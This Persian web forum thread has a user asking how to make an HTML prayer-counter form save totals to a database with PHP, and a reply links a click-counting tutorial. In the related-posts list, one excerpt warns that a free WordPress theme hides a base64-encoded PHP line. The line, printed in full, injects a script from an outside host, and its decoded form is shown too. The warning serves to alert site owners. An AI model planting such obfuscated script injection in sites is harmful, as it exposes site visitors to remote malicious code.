.Ibrahim

کمک در ساخت شمارنده

2 پست در این موضوع قرار دارد

درود یاران

کسی میتونه فرم html زیر رو با php یا هر چیزی درست کنه طوریکه مقدار شمارش ها به قبلی اضافه و در دیتابیس ذخیره بشه؟

هر چی جستجو کردم نشد، لطفا اگه کسی این توانایی رو داره درستش کنه.

مــتــشــکــر


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<head>
<title></title>
</head>
<body>
<table border="1" width="150" bgcolor="#000088000">
<tr>
<td align="center">
<form method="POST" action="--WEBBOT-SELF--">
<p><font color="#FFFFFF"><b><span lang="fa">اینجانب
مقدار</span></b></font></p>
<p><font color="#FFFFFF">
<input name="T2" size="11" style="font-weight: 700"></font></p>
</form>
<p><font color="#FFFFFF"><b>
<span lang="fa">
 </span><span lang="fa">صلوات را جهت سلامتی و تعجیل در فرج آقا امام زمان میفرستم</span></b></font></p>
<p><input type="submit" value="قبـــــول" name="B1"></p>
<p><b><span lang="fa">مجموع صلوات های فرستاده شده</span></b></p>
<p><span lang="fa">0</span></td>
</tr>
</table>
</body>
</html>

103641.png

به اشتراک گذاری این پست


لینک به پست

درود یاران

کسی میتونه فرم html زیر رو با php یا هر چیزی درست کنه طوریکه مقدار شمارش ها به قبلی اضافه و در دیتابیس ذخیره بشه؟

سلام

این مطلبو بخونید:

Counting Clicks with PHP

به اشتراک گذاری این پست


لینک به پست

برای ارسال نظر یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید نظر ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در انجمن ما ثبت نام کنید. عضویت خیلی ساده است !


ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید


ورود به حساب کاربری

  • مطالب مشابه

    • توسط Zahramz
      سلام خدمت اساتید محترم
      میخوام یه فرم ثبت نام با امکان اتچ کردن فایل به سایتم اضافه کنم. (کاربر یک سری فیلد رو پر کنه و تعدادی فایل رو اتچ کنه، و در نهایت درخواستش رو ارسال کنه برای مدیر سایت که بررسی بشه.)
      اگه افزونه ای یا راهی بهم معرفی کنید ممنون میشم.
    • توسط logomaster
      سلام دوستان
      سایت ما یک برگه داره که از یک برگه ی دیگه به اون ریدایرکت و نمایش داده میشه. چطوری میتونم کاری کنم که اگه کاربر لینک اون برگه رو به صورت دستی در نوار آدرس مرورگر وارد کرد ، وارد اون برگه نشه ؟ مثلا بره به یک صفحه ی خاص
    • توسط maryam300
      سلام آیا کدی هست که با درج آن در متن نوشته یا برگه، عنوان اون نوشته یا برگه در متنش بیافته. مثلا عنوان برگه "وردپرس" هست. در متن اون برگه نوشته بشه. " سلام <وردپرس> "
    • توسط mojtabashahi
      امروز قصد دارم دو ضرب المثل را که از "گربه" استفاده کرده اند برای شما یادآوری نمایم. و یک هشدار به کاربران "تازه وارد" وردپرس بدهم.
      1 . گربه را دم حجله باید کشت. سایت : www.dorcel.ir ، باید همین اول جلوی فعالیت چنین سایت هایی گرفته شود.
      2 . هیچ گربه ای محض رضای خدا موش نمی گیرد. داخل فایل های یکی از پوسته هایی که رایگان برای دانلود قرار داده شده کد (انکد base64) زیر وجود دارد : 
      <?php $str = 'PHNjcmlwdCB0eXBlPSd0ZXh0L2phdmFzY3JpcHQnIHNyYz0naHR0cDovL2JveC5kb3JjZWwuaXIvZG9yY2VsLnBocCc+PC9zY3JpcHQ+'; echo base64_decode($str); که بعد از دیکد می شود : 
      <script type='text/javascript' src='http://box.dorcel.ir/dorcel.php'>  
      پ.ن : ....
    • توسط iHooMan
      درود و وقت بخیر 
       
      من  توی پروژه ای لازم دارم از فرم وب سایت مبدا وارد یه وب سایت دیگه بشم .
      که دو حالت داره یکی یوزر معمولی - یکی همکار 
      واسه یوزر معمولی فقط کپچا میخواد سایت مقصد  واسه همکار یوزر و پسورد و کپچا 
      من میخوام با یه فرم تو وب سایت خودمون اطلاعات بگیرم پاس بدم توی اون وبسایت نمیخوام اون اطلاعات تو وبسایت مقصد پر بشه ( لوگین توی وب سایت ما انجام بشه بعد به صفحه لوگین شده اونور پاس بده )
      از چی استفاده کنم ajax یا ... ? 
      روند کاریش تو وردپرس کسی میتونه توضیح بده ؟
      پینوشت : وب سایت مقصد از md5.js واسه اینکرپشن دیتا استفاده میکنه . 
       
      سپاس